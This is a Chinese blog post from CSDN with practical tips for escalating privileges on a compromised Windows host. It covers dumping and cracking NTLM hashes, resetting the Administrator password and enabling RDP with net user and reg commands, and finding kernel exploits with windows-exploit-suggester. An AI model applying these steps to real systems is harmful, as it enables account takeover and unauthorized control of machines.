内网渗透拿掉shell后提升权限的几个小思路--洪水猛兽

最新推荐文章于 2024-04-10 13:21:13 发布
最新推荐文章于 2024-04-10 13:21:13 发布
阅读量1.5k 收藏 10
点赞数 1
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42665738/article/details/120210376
版权

内网渗透拿掉shell后提升权限的几个小思路

思路一:想办法获得Administrator密码

  1. 使用getpass小工具直接获取并破解密码:
    在这里插入图片描述

  2. 如果getpass被查杀,可以使用PwDump7.exe或者QuarksPwDump.exe得到密码的NTML哈希值,然后再去各种MD5网站解密。
    在这里插入图片描述

  3. 如果得到密码的NTML哈希无法破解,可以采用彩虹表爆破的方式,爆破出Administrator的密码:保存扫描出的NTML哈希值->使用ophcrack(去官网下载字典库https://ophcrack.sourceforge.io/tables.php)梭哈一下。

思路二:蚁剑连接后连接远程shell进行Administrator用户的密码修改:

  1. whoami //查询当前用户权限
  2. net user //查看系统用户
  3. net user Administrator pte //修改Administrator用户密码为pte
  4. reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t reg_dword /d 0 /f //开启3389远程终端
  5. win7/win8/win10:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server\WinStations\RDP-Tcp /v PortNumber
    winxp/win2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server\Wds\rdpwd\Tds\tcp /v PortNumber //查询3389远程服务端口
  6. 使用Administrator用户及新修改的密码远程登陆系统,做你想做的->_>
    在这里插入图片描述

思路三:通过检测脚本得到漏洞扫描结果进行分析,然后使用对应的漏洞exp直接提权:

  1. systeminfo查询系统是否打了补丁,把信息保存为systeminfo.txt

  2. 使用脚本扫描存在的漏洞:python windows-exploit-suggester.py -i systeminfo.txt -d 2017-06-14-mssb.xls (这个脚本专门用来扫打过补丁的Windows漏洞)
    扫出来大概是这个样子:
    [] initiating winsploit version 3.3…
    [    ] database file detected as xls or xlsx based on extension
    [] attempting to read from the systeminfo input file
    [+] systeminfo input file read successfully (utf-8)
    [    ] querying database file for potential vulnerabilities
    [] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
    [    ] there are now 356 remaining vulns
    [+] [E] exploitdb PoC, [M] Metasploit module, [] missing bulletin
    [+] windows version identified as ‘Windows 2003 SP2 32-bit’
    [    ]
    [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
    [] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
    [    ] https://www.exploit-db.com/exploits/37367/ – Windows ClientCopyImage Win32k Exploit, MSF…此处省去一大堆漏洞

  3. 之后可以根据扫出来的漏洞编号去exploit_db啥的去搜exp,然后上传对应的exe进行触发执行,从而将攻击权限提升至system权限。
    注:[E]代表exploit_db中有该漏洞的exp,[M]代表msf中有该漏洞的exp,[*]当前没有现成的exp。
    废话:检测用的一些小玩意儿自己可平时去小破站积累或者去贴靠谱师傅们的大腿蹭几个用,牛的自己想法儿写:)

洪水猛兽zmm
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透--windows提权
hee_mee的博客
07-28 1103
zeroNIl
【渗透技巧】内网渗透思路
11-30 1844
0×01 前言 假如,有一个接入点,可以访问内网服务器网段,如何尽可能的发现服务器网段中可能面临的威胁、存在的安全弱点? ×02 信息收集 首先,对服务器资产信息进行收集,了解哪些ip是存活的,存活的ip开放了哪些端口,以及端口所对应的服务。 推荐工具:F-NAScan github地址:https://github.com/ywolf/F-NAScan 网络资产信息快速收集,结果生...
拿下shell提权技巧
09-11 498
提权的技巧分享:1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.com cmd.txt cmd.rar等 2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那...
Exploit-DB与相关本地工具的综合运用
最新发布
Kali与编程
04-10 390
例如,在进行web应用渗透时,可能先用Nmap扫描目标网络服务,再结合Burp Suite抓包分析请求响应,找出潜在漏洞点,最后在Exploit-DB中寻找适用的exploit并实施攻击。Exploit-DB作为丰富的漏洞利用资源库,与本地安全工具的紧密结合能够极大提高安全研究和渗透测试的工作效率。以Metasploit Framework为例,这是一个集成开发环境,集成了众多Exploit-DB中的exploit,并提供了图形化和命令行界面,方便用户执行和管理渗透测试任务。二、Exploit-DB简介。
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1383
getshell之后的提权
拿下shell提权命令
09-11 355
分享常用的DOS命令:查看版本:ver 查看权限:whoami 查看配置:systeminfo 查看用户:net user 查看进程:tasklist 查看正在运行的服务:tasklist /svc 查看开放的所有端口:netstat -ano 查询管理用户名:query user 查看搭建环境:ftp 127.0.0.1 查看指定服务的路径:sc qc Mysql 添加一个用户:net...
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1103
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
内网渗透流程与思路和工具讲解
04-10
内网渗透流程与思路和工具讲解 内网渗透测试是一个复杂的过程,需要了解目标网络的结构、系统配置、软件版本、开放端口等信息。以下是内网渗透测试的流程和思路: 1. 内网信息收集 在内网渗透测试中,信息收集是...
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
拿webshell提权的教程
04-03
拿webshell到的教程.part1.rar
内网渗透综合实验 - 实验指导书
10-23
内网渗透综合实验 - 实验指导书,通过实验学习内网渗透的细节,掌握内网攻防的具体步骤,可以进行实战操作
内网渗透的基本思路
BING
09-19 2882
内网渗透的基本思路 1.拿到外网web服务器权限 这里我使用的phpstudy搭建的靶机利用站点upload获取到基本web服务器权限。 进入站点 看到第一关,表示只能上传后缀为jpg|png|gif 这里我们借助Burpsuite工具将上传包含一句话木马后缀为png文件,后缀改为php,实现绕过。 一句话木马,后缀为png 将包放过后出现一个图片形状,右击获取图片的地址。 http://192.168.146.137/upload/upload/526.php 通过
webshell 提权
wing_7的博客
10-05 721
启动http服务时,使用的是win11 +kali + ubuntu,ubuntu 启动vulhub ,kali启动http服务,使用find 或者locate 获取文件路径,locate 初次使用可能没有任何显示,需要使用updatedb更新数据。ubuntu kali的地址ip 地址使用wget 对kernel cve 提权文件漏洞文件.c进行下载。由于使用wsl2 的配置未使用vmware ,在localhost 可以看到对应的文件。在exp 的路径下使用python启用web 服务。
Metasploit拿到shell后 低权限---提权
qq_58000413的博客
08-24 1455
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
实战渗透-一次拿到webshell后艰难的提权
qq_29437513的博客
07-25 2073
记上一篇,拿到webhshell后,数据库是dba, 本地上传一个cmd.exe组件上去后,执行失败 网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权, 环境是php,但支持asp,有iis组件, 发现 D://recycle可写,传一个cmd.com组件执行命令 权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的 支持的组件,提权的时候用的找 ===================== 查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以
内网服务器被人种植shell,怎么做应急响应(简单高效一般流程)
Vdieoo的博客
10-30 457
内网服务器被人种植shell,怎么做应急响应 常态化安全检查与安全加固 中间是流程 下层是 收集安全系统报警信息,根据威胁情报平台和之前误报的信息初步研判(何种安全事件),自己能解决则利用应急技能(进程分析,日志分析,样本分析)(清理处置:断网后远程连接杀进程,删文件,打补丁,查看攻击途径与操作并修复)自己解决。不能则进行上报,处理完后输出安全...
获取Shell后的操作
墨鱼菜鸡
06-21 976
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。 Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢? 第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...
linux内网渗透反弹shell
08-03
在Linux内网渗透中,反弹shell是一种常见的技术手段。其中,Bash反弹shell是最简单且最常见的一种方式。首先,在攻击机上使用nc命令监听一个端口。然后,在目标机器上使用Python脚本去反向连接攻击机的IP和端口。这样,攻击机的终端就可以获得目标机器的shell。除了Bash反弹shell,还可以使用Kali的MSF框架生成木马来反弹shell。此外,在内网渗透中,还经常涉及端口转发和正向代理的概念。这些技术手段可以帮助渗透测试人员在内网环境中获取更多的权限和信息。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值